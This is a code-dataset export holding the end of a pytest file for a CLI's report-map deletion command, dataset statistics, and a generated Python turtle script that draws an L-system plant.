"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
"interactive": {
"input": "y",
"message": "Mapping for template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 and "
"report with id 3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8 was created by adora@example.com. Are "
"you sure you want to delete? [y/N]: y\n",
},
},
{
"args": [
"template",
"delete_report_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": "",
"interactive": {
"input": "n",
"message": "Mapping for template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 and "
"report with id 3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8 was created by adora@example.com. Are "
"you sure you want to delete? [y/N]: n",
},
"logging": "Okay, aborting delete operation",
},
{
"args": ["template", "delete_report_map_by_id"],
"ids": [],
"email": "rogelio@example.com",
"return": "Usage: carrot_cli template delete_report_map_by_id [OPTIONS] ID REPORT_ID\n"
"Try 'carrot_cli template delete_report_map_by_id --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def delete_report_map_by_id_data(request):
# We want to load the value from "email" from config
mockito.when(config).load_var("email").thenReturn(request.param["email"])
# Set all requests to return None so only the one we expect will return a value
mockito.when(template_reports).delete_map_by_ids(...).thenReturn(None)
mockito.when(template_reports).find_map_by_ids(...).thenReturn(None)
# Mock up request response only if we expect it to get that far
if len(request.param["ids"]) > 0:
mockito.when(template_reports).delete_map_by_ids(
request.param["ids"][0],
request.param["ids"][1],
).thenReturn(request.param["return"])
mockito.when(template_reports).find_map_by_ids(
request.param["ids"][0],
request.param["ids"][1],
).thenReturn(request.param["find_return"])
return request.param
def test_delete_report_map_by_id(delete_report_map_by_id_data, caplog):
caplog.set_level(logging.INFO)
runner = CliRunner()
# Include interactive input and expected message if this test should trigger interactive stuff
if "interactive" in delete_report_map_by_id_data:
expected_output = (
delete_report_map_by_id_data["interactive"]["message"]
+ delete_report_map_by_id_data["return"]
+ "\n"
)
result = runner.invoke(
carrot,
delete_report_map_by_id_data["args"],
input=delete_report_map_by_id_data["interactive"]["input"],
)
assert result.output == expected_output
else:
result = runner.invoke(carrot, delete_report_map_by_id_data["args"])
assert result.output == delete_report_map_by_id_data["return"] + "\n"
# If we expect logging that we want to check, make sure it's there
if "logging" in delete_report_map_by_id_data:
assert delete_report_map_by_id_data["logging"] in caplog.text
| 36.869933
| 117
| 0.490286
| 5,884
| 60,946
| 4.926411
| 0.045377
| 0.053403
| 0.042226
| 0.084452
| 0.943043
| 0.921275
| 0.899162
| 0.869562
| 0.842999
| 0.819747
| 0
| 0.117798
| 0.380025
| 60,946
| 1,652
| 118
| 36.892252
| 0.649358
| 0.042168
| 0
| 0.719663
| 0
| 0.003894
| 0.350465
| 0.157695
| 0
| 0
| 0
| 0
| 0.016872
| 1
| 0.022064
| false
| 0
| 0.005191
| 0
| 0.037638
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63c22af98d528de2eb18bb4142012d9e20412cc5
| 316,580
|
py
|
Python
|
L_System Python Projet/fichierDeSortie.py
|
Madaxuorel/Modelisation-L-Systems
|
bfbc745e71af87a1201530fd89b0e3694cf2d030
|
[
"MIT"
] | 1
|
2022-03-06T23:09:06.000Z
|
2022-03-06T23:09:06.000Z
|
L_System Python Projet/fichierDeSortie.py
|
Madaxuorel/Modelisation-L-Systems
|
bfbc745e71af87a1201530fd89b0e3694cf2d030
|
[
"MIT"
] | null | null | null |
L_System Python Projet/fichierDeSortie.py
|
Madaxuorel/Modelisation-L-Systems
|
bfbc745e71af87a1201530fd89b0e3694cf2d030
|
[
"MIT"
] | null | null | null |
from turtle import *
color('black')
speed(0)
left(22.5) ;
left(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((6.12,14.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((6.12,14.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((6.12,14.78), 67.5)];
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((6.12,14.78)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((12.25,29.56)), setheading(45.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((12.25,29.56)), setheading(67.5) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((27.03,35.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((27.03,35.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((27.03,35.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((27.03,35.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((38.34,47.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((38.34,47.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((38.34,47.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((38.34,47.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((44.46,61.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((44.46,61.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((44.46,61.78), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((44.46,61.78)), setheading(67.5) ;
pu(), setposition((12.25,29.56)), setheading(45.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((12.25,45.56), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((12.25,45.56)), setheading(67.5) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((12.25,45.56), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((12.25,45.56)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((18.37,60.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,60.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((18.37,60.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,60.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((29.68,71.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((29.68,71.66)), setheading(22.5) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((29.68,71.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((29.68,71.66)), setheading(45.0) ;
pu(), setposition((12.25,29.56)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((18.37,44.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,44.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((18.37,44.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,44.35)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,59.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,59.13)), setheading(67.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((39.27,65.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((39.27,65.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((39.27,65.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((39.27,65.25)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((50.59,76.56), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((50.59,76.56)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((50.59,76.56), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((50.59,76.56)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((56.71,91.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((56.71,91.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((56.71,91.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((56.71,91.35)), setheading(67.5) ;
pu(), setposition((24.49,59.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,75.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,75.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,75.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,75.13)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((30.61,89.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,89.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((30.61,89.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,89.91)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((41.93,101.22), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,101.22)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((41.93,101.22), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,101.22)), setheading(45.0) ;
pu(), setposition((24.49,59.13)), setheading(67.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((39.27,65.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((39.27,65.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((39.27,65.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((39.27,65.25)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.06,71.37)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.06,71.37)), setheading(22.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((68.84,65.25), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.84,65.25)), setheading(315.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((68.84,65.25), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.84,65.25)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((84.84,65.25), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.84,65.25)), setheading(337.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((84.84,65.25), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.84,65.25)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((99.62,71.37), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.62,71.37)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((99.62,71.37), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.62,71.37)), setheading(22.5) ;
pu(), setposition((54.06,71.37)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((65.37,82.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.37,82.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((65.37,82.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.37,82.69)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((80.15,88.81), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((80.15,88.81)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((80.15,88.81), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((80.15,88.81)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((96.15,88.81), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((96.15,88.81)), setheading(337.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((96.15,88.81), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((96.15,88.81)), setheading(0.0) ;
pu(), setposition((54.06,71.37)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((65.37,82.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.37,82.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((65.37,82.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.37,82.69)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.68,94.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.68,94.00)), setheading(45.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((92.68,94.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((92.68,94.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((92.68,94.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((92.68,94.00)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((107.47,100.12), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.47,100.12)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((107.47,100.12), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.47,100.12)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((118.78,111.44), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.78,111.44)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((118.78,111.44), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.78,111.44)), setheading(45.0) ;
pu(), setposition((76.68,94.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((82.81,108.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((82.81,108.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((82.81,108.78), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((82.81,108.78)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((94.12,120.10), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((94.12,120.10)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((94.12,120.10), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((94.12,120.10)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((108.90,126.22), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.90,126.22)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((108.90,126.22), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.90,126.22)), setheading(22.5) ;
pu(), setposition((76.68,94.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((82.81,108.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((82.81,108.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((82.81,108.78), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((82.81,108.78)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.93,123.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.93,123.57)), setheading(67.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((103.71,129.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.71,129.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((103.71,129.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.71,129.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((115.02,141.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((115.02,141.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((115.02,141.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
